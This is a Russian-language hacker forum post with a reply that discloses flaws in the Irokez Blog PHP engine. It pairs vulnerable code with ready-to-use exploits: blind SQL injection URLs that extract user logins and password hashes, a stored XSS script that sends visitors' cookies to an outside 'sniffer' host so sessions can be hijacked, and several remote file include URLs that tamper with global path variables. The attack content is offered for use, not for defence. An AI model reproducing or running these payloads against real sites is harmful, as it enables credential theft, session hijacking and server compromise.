Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS

Corwin · 27 Feb 2009

Очередной движек автор которого видимо не имеет представления о безопасном программировании. Ничего особо интересного, но для новичков копающих чужие сорцы будет полезно.

Application: Irokez Blog
------------
Website: http://irokez.org
--------
Version: All (0.7.3.2)
--------
Date: 11-02-2009
-----

[ BLIND SQL-INJECTION ]

[ SOME VULNERABLE CODE ]

PHP:

//classes/table.class.php ... if ($is_trans) {                 $query = "select t.*, m.* from {$this->_name} m"                        . " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"                        . " where m.id = '$id' group by {$this->_lang}";             } else {                 $query = "select * from {$this->_name} where id = '$id'";             }             $result = $this->db->exeQuery($query);

===>>> Exploit:

http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115
http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114
etc

[ ACTIVE XSS ]

В комментариях. Уводим сессию, вставляем в куки.

[ SOME VULNERABLE CODE ]

PHP:

/scripts/blog/output-post.inc.php <input id="name" type="text" class="text" name="name" value="<?php echo $name?>" />                 <label for="name"><?php echo $GLOBALS['LANG']['blog']['name']?></label>             </li>             <li>                 <input id="email" type="text" class="text" name="email" value="<?php echo $email?>" />                 <label for="email"><?php echo $GLOBALS['LANG']['blog']['email']?></label>             </li>             <li>                 <input id="site" type="text" class="text" name="site" value="<?php echo $site?>" />                 <label for="site"><?php echo $GLOBALS['LANG']['blog']['site']?></label> ... <textarea id="message" name="message" class="textarea"><?php echo $message?></textarea>

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

[ INCLUDE ]

Через суперглобальный массив.

[ SOME VULNERABLE CODE ]

PHP:

/thumbnail.php ... ob_start(); switch ($module) {     case 'gallery':         include_once $GLOBALS['PTH']['classes'] . 'gallery.class.php';         $Obj = new TBL_Gallery;         $image_path = $GLOBALS['PTH']['gallery'] . getVar($Obj->select($id), 'src');         break;     default:         $image_path = ''; }

===>>> Exploit:

http://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
http://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
http://irokez/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
http://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]
итд

HAXTA4OK · 19 Sep 2009

http://site/irokezblog/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=[include]
http://site/iirokezblog/scripts/search.scr.php?GLOBALS[PTH][classes]=[include]
http://site/irokezblog/scripts/archive.scr.php?GLOBALS[PTH][classes]=[include]

Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS

Corwin Elder - Старейшина

HAXTA4OK Super Moderator
Staff Member

Useful Searches

Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS

Corwin Elder - Старейшина

HAXTA4OK Super Moderator Staff Member

HAXTA4OK Super Moderator
Staff Member